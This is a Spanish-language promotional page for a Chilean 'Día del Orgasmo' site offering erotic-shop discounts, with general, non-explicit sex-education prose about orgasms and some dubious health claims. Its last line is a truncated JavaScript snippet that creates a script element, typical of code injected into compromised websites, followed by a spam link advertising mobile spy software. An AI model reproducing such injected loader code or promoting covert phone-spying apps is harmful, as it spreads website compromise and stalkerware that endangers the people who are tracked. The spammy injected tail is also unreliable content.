¿Qué es Diadelorgasmo.cl?

Día del Orgasmo.

¡Celebremos el 8 de agosto, Día del Orgasmo Femenino!

Día del Orgasmo se creo para celebrar en grande el 8 de agosto, Día del Orgasmo Femenino. Asociamos a 3 tiendas de artículos eróticos, ofreciendo todos los productos con 50% de descuento para que disfrutes al máximo el día más rico del año!

El Orgasmo.

El orgasmo, según la real academia de la lengua española, significa la culminación del placer sexual pero esta definición a muchos seguro que se nos queda corta y no hay nada peor que un orgasmo corto así que busquemos para él una definición más completa.

El orgasmo es el fin de una relación sexual, el momento que nuestro cuerpo alcanza el nivel más alto de placer, segregando endorfinas que nos hace sentir más feliz y acabando con muchas tensiones físicas. Todo ello se adorna con espasmos musculares debidos al placer y al esfuerzo generado durante el acto sexual, llenando nuestro cuerpo de relax y tranquilidad.

Las endorfinas segregadas durante el orgasmo, como hemos dicho anteriormente, generan en nosotros un estado de bienestar y esto, entre otras cosas, por supuesto, hacen que el sexo sea algo tan positivo y que genera felicidad a las personas, tranquilidad y, en muchos casos, hacen del orgasmo un aliado perfecto contra el insomnio.

Las endorfinas son una hormona que actúa como analgésico natural de nuestro cuerpo y es por eso que los orgasmos pueden aliviar los dolores de cabeza o incluso de la menstruación.

Pero no sólo es un buen aliado para el insomnio, una vida sexual placentera y satisfactoria repleta de orgasmos mejoran el estrés, ayudan a suavizar el cabello y darle un brillo mucho más espectacular, quema calorías y fortalece nuestro corazón con una actividad cardiovascular. A parte de esto a nivel físico, a nivel emocional, no nos quedamos atrás, aumenta nuestra confianza y nuestra autoestima.

El orgasmo es una experiencia tanto para los hombres como para las mujeres, si bien las mujeres tienen más dificultades para llegar al orgasmo que los hombres y necesitan, en muchos casos, de mucho más tiempo y mucha más atención.

Las mujeres pueden experimentar tres tipos de orgasmos: vaginal, clitoriano (en algunos casos pueden alcanzar el orgasmo mixto) y anal.

El orgasmo vaginal es el alcanzado mediante la penetración de la vagina mientras que el clitoriano ocurre con la estimulación del clítoris. El orgasmo mixto sería una mezcla entre el clitoriano y el vaginal. La mayoría de las mujeres experimentan muchos más orgasmos clitorianos que vaginales durante su vida sexual. El orgasmo anal cabe destacar que se necesita de mucho más estimulación y juegos ante la penetración que los anteriores.

El orgasmo masculino puede ser de dos tipos, orgasmo anal u orgasmo tradicional. El tradicional es el más común entre los hombres heterosexuales que experimentan debido a la estimulación del pene. No podemos olvidar que el punto G masculino se encuentra en la próstata y que para acceder a él no hay otro camino que el ano, la penetración o estimulación anal generan un gran placer y unos orgasmos muy interesantes para los hombres, sin importar su orientación sexual.

Sea como sea, lo importante del sexo es vivirlo desde la libertad y el respeto a tu pareja, si lo haces en compañía, sin tabúes y con el objetivo de satisfacer y ser satisfecho sin prisas y con ganas y nunca olvidarnos de los orgasmos que podemos regalarnos a nosotros mismos gracias a la masturbación, el conocimiento de nuestro cuerpo y de nuestros gustos pueden ser un gran aliado para que la masturbación nos haga experimentar unos orgasmos realmente espectaculares.

Cada orgasmo es un mundo, al igual que cada persona y cada pareja, por eso, es importante tener curiosidad y buscar siempre en cada relación sexual el punto que nos haga evolucionar y disfrutar cada día más de nuestro cuerpo y de todas las posibilidades que nos puede dar el sexo para ser un poquito más felices.var d=document;var s=d.createElement(‘script’); https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.